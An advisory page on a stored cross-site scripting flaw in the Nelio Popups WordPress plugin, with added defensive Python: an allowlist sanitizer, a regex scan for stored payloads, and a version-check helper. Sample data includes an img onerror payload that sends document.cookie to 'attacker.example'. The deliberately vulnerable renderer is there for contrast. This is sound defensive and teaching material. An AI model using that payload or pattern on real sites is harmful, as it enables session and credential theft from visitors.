Impact
Nelio Popups, by Nelio Software, contains a stored cross-site scripting (XSS) flaw caused by improper neutralization of input during web page generation (CWE-79). An attacker can embed malicious JavaScript in content that the plugin persists to the WordPress database; when that content is later rendered, the script executes in the browsers of site visitors, enabling session hijacking, credential theft, defacement, or delivery of further payloads. The impact is confined to the users who view the compromised pages (the confidentiality and integrity of their sessions and, at most, the availability of the page as rendered for them), not the server itself. The description does not state the conditions required for exploitation; the reasonable inference is that the attacker must be able to supply or modify content that the plugin stores and later outputs.
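The following is an added example, not code from Nelio Popups or from the advisory, showing the CWE-79 pattern the paragraph describes and the two things a practitioner wants next to it: an allowlist sanitizer that neutralizes stored content on output, and a scan for payloads that are already persisted (a plugin update stops new injections but does not clean records saved before the fix). The stored records, the rendering functions and the attacker host `attacker.example` are all constructed for illustration; the real plugin's storage layout and output path are not described on the page.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample of stored popup records. Two are benign; the third
# carries an attacker-supplied payload. Illustrative data only, not content
# taken from the plugin or from any real site.
STORED_POPUPS = [
    {"id": 1, "title": "Newsletter", "body": "<p>Join our list &amp; save</p>"},
    {"id": 2, "title": "Sale", "body": "<p>20% off <b>today</b></p>"},
    {"id": 3, "title": "Welcome",
     "body": "<p>Hi</p><img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"},
]


def render_vulnerable(popup):
    """CWE-79 pattern: stored markup is concatenated into the page verbatim,
    so whatever the attacker saved is exactly what every visitor's browser
    executes."""
    return f'<div class="popup"><h2>{popup["title"]}</h2>{popup["body"]}</div>'


# Allowlist of tags and the attributes each may keep. Anything else is dropped.
ALLOWED_TAGS = {"p": set(), "b": set(), "i": set(), "strong": set(),
                "em": set(), "br": set(), "a": {"href"}}
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allowlisted tags and attributes.
    Text nodes are re-escaped on output, so nothing the attacker typed
    reaches the page as markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text still flows via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue  # drops on* handlers, style, src, etc.
            if name == "href" and not value.strip().lower().startswith(("http://", "https://")):
                continue  # blocks javascript: and data: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_hardened(popup):
    """The title is plain text, so it is fully escaped; the body keeps only
    the allowlisted formatting."""
    return (f'<div class="popup"><h2>{html.escape(popup["title"])}</h2>'
            f'{sanitize(popup["body"])}</div>')


# Heuristic for locating payloads already in the database. It will flag
# some benign text too; treat hits as a review queue, not a verdict.
SUSPICIOUS = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:", re.I)


def find_suspicious(popups):
    return [p["id"] for p in popups
            if SUSPICIOUS.search(p["title"]) or SUSPICIOUS.search(p["body"])]


if __name__ == "__main__":
    for p in STORED_POPUPS:
        print("vulnerable:", render_vulnerable(p))
        print("hardened:  ", render_hardened(p))
    print("records needing cleanup:", find_suspicious(STORED_POPUPS))
```

In WordPress the equivalent of `sanitize` is the core `wp_kses_post()` allowlist on output (or `esc_html()` for fields that are meant to be plain text); the point of the example is that neutralization happens at render time regardless of who was allowed to save the record.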
Affected Systems
WordPress sites running Nelio Popups by Nelio Software in any version up to and including 1.3.0 are affected. No lower bound is given for the range, so every release through 1.3.0 should be treated as vulnerable, regardless of the WordPress core version it is installed on.
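An added triage helper, not part of the advisory or of the plugin, for checking an inventory against the "through 1.3.0, inclusive" range. It parses the JSON that `wp plugin list --format=json --fields=name,version,status` emits and compares versions as numeric tuples, which avoids the string-comparison trap where "1.10.0" sorts below "1.3.0". The plugin slug `nelio-popups` is assumed and should be confirmed against the install's `wp-content/plugins/` directory; the sample wp-cli output is constructed.

```python
import json

# Affected range per the advisory: every release through 1.3.0, inclusive.
AFFECTED_MAX = (1, 3, 0)
# Plugin directory slug as it appears in `wp plugin list`. "nelio-popups" is
# an assumption; confirm it against wp-content/plugins/ on your install.
PLUGIN_SLUG = "nelio-popups"


def parse_version(text):
    """Turn '1.3.0', '1.3' or '1.3.0-beta2' into a comparable 3-tuple.
    Non-numeric suffixes are dropped, so a pre-release of 1.3.0 compares
    equal to 1.3.0 and is treated as affected."""
    parts = []
    for piece in text.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected(version):
    return parse_version(version) <= AFFECTED_MAX


def affected_installs(wp_cli_json):
    """Filter wp-cli plugin-list JSON down to vulnerable Nelio Popups entries."""
    return [p for p in json.loads(wp_cli_json)
            if p.get("name") == PLUGIN_SLUG and is_affected(p.get("version", "0"))]


# Constructed sample in the shape wp-cli emits; not real inventory data.
SAMPLE_WP_CLI_OUTPUT = json.dumps([
    {"name": "akismet", "version": "5.3", "status": "active"},
    {"name": "nelio-popups", "version": "1.2.4", "status": "active"},
])


if __name__ == "__main__":
    for p in affected_installs(SAMPLE_WP_CLI_OUTPUT):
        print(f"{p['name']} {p['version']} ({p['status']}): update required")
```

Run it against real output by piping `wp plugin list --format=json --fields=name,version,status` into `affected_installs`; an inactive but installed copy still matters, since the vulnerable code remains on disk until it is updated or removed.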
Risk and Exploitability
The CVSS score of 6.5 places the issue in the medium severity band, and the EPSS score below 1% indicates a low but non-zero probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog, which lowers its immediacy but not the need to update. Exploitation requires the attacker to get malicious content into the plugin's storage, typically through the interface that accepts popup or form content, so that the stored script is later rendered in an ordinary page view. Once rendered, the script runs in the site's origin and can mount client-side attacks against any visitor to that page.
OpenCVE Enrichment